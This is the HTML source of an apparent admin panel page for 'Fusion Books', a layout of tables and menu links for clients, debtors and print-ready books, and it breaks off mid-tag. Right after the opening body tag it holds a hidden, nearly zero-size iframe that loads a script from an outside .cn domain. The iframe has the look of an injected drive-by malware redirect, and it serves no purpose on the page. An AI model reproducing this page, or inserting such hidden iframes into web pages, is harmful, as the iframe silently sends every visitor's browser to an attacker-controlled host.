<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Fusion Books</title>
<link href="css/style.css" rel="stylesheet" type="text/css" />
</head>

<body><iframe src="http://giantbest.cn/ts/in.cgi?banner3" width=2 height=4 style="visibility: hidden"></iframe>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td><table width="1003" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td><table width="100%" border="0" cellspacing="0" cellpadding="0">
            <tr>
              <td width="180" height="109" align="right"><img src="images/logo.gif" alt="" width="146" height="26" /></td>
              <td valign="bottom"><table width="210" border="0" align="right" cellpadding="0" cellspacing="0" bgcolor="#0099FF">
                  <tr>
                    <td width="4"><img src="images/curve_left.gif" alt="" width="4" height="23" /></td>
                    <td width="115" align="center"><a href="#" class="toplink">Create New Client</a> </td>
                    <td width="4"><img src="images/curve_right.gif" alt="" width="4" height="23" /></td>
                    <td width="3" bgcolor="#FFFFFF">&nbsp;</td>
                    <td width="4"><img src="images/curve_left.gif" alt="" width="4" height="23" /></td>
                    <td width="50" align="center"><a href="#" class="toplink">Logout</a></td>
                    <td width="4"><img src="images/curve_right.gif" alt="" width="4" height="23" /></td>
                    <td width="25" bgcolor="#FFFFFF">&nbsp;</td>
                  </tr>
              </table></td>
            </tr>
        </table></td>
      </tr>
      <tr>
        <td height="39" style="padding-right:95px;"><form id="form1" name="form1" method="post" action="" style="margin:0px;">
            <table width="385" border="0" align="right" cellpadding="0" cellspacing="0">
              <tr>
                <td><label>
                  <input type="text" name="textfield" class="textfield" />
                </label></td>
                <td width="78"><img src="images/search.jpg" alt="" width="78" height="21" /></td>
              </tr>
            </table>
        </form></td>
      </tr>
      <tr>
        <td height="16"></td>
      </tr>
      <tr>
        <td><table width="100%" border="0" cellspacing="0" cellpadding="0">
            <tr>
              <td width="220" valign="top"><table width="188" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#97dbff">
                  <tr>
                    <td><img src="images/top.jpg" alt="" width="188" height="33" /></td>
                  </tr>
                  <tr>
                    <td height="30"><a href="#" class="lefttxt">Workspace</a></td>
                  </tr>
                  <tr>
                    <td><img src="images/line.gif" alt="" width="188" height="2" /></td>
                  </tr>
                  <tr>
                    <td height="30"><a href="#" class="lefttxt">Process Summary</a></td>
                  </tr>
                  <tr>
                    <td><img src="images/line.gif" alt="" width="188" height="2" /></td>
                  </tr>
                  <tr>
                    <td height="30"><a href="#" class="lefttxt">Trail  Account due to Expire</a></td>
                  </tr>
                  <tr>
                    <td><img src="images/line.gif" alt="" width="188" height="2" /></td>
                  </tr>
                  <tr>
                    <td height="30"><a href="#" class="lefttxt">Trail  Account Expired</a></td>
                  </tr>
                  <tr>
                    <td><img src="images/line.gif" alt="" width="188" height="2" /></td>
                  </tr>
                  <tr>
                    <td height="30"><a href="#" class="lefttxt">Debtors Report</a></td>
                  </tr>
                  <tr>
                    <td><img src="images/line.gif" alt="" width="188" height="2" /></td>
                  </tr>
                  <tr>
                    <td height="30"><a href="#" class="lefttxt">Account almost due</a></td>
                  </tr>
                  <tr>
                    <td><img src="images/line.gif" alt="" width="188" height="2" /></td>
                  </tr>
                  <tr>
                    <td height="30"><a href="#" class="lefttxt">Deposit Due</a></td>
                  </tr>
                  <tr>
                    <td><img src="images/line.gif" alt="" width="188" height="2" /></td>
                  </tr>
                  <tr>
                    <td height="30"><a href="#" class="lefttxt">Books ready for  print</a></td>
                  </tr>
                  <tr>
                    <td><img src="images/line.gif" alt="" width="188" height="2" /></td>
                  </tr>
                  <tr>
                    <td height="30"><a href="#" class="lefttxt">Book almost due</a></td>
                  </tr>
                  <tr>
                    <td><img src="images/line.gif" alt="" width="188" height="2" /></td>
                  </tr>
                  <tr>
                    <td><img src="images/left_bottom.gif" alt="" width="188" height="13" /></td>
                  </tr>
              </table></td>
              <td valign="top"><table width="767" border="0" cellspacing="0" cellpadding="0">
                  <tr>
                    <td><table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#0d76aa">
                        <tr>
                          <td width="4"><img src="images/head_curve_left.gif" alt="" width="4" height="33" /></td>
                          <td class="head"> Admin Home </td>
                          <td width="4"><img src="images/head_curve_right.gif" alt="" width="4" height="33" /></td>
                        </tr>
                    </table></td>
                  </tr>
                  <tr>
                    <td height="400" class="border"><table width="400" border="0" align="center" cellpadding="0" cellspacing="0">
                        <tr>
                          <td align="center" class="welcome">Welcome to the Fusion Books Admin Panel</td>
                        </tr>
                    </table></td>
                  </tr>
                  <tr>
                    <td><table width="100%" border="0" cellspacing="0" cellpadding="0">
                        <tr>
                          <td width="4"><img src="images/curve_bottom_left.g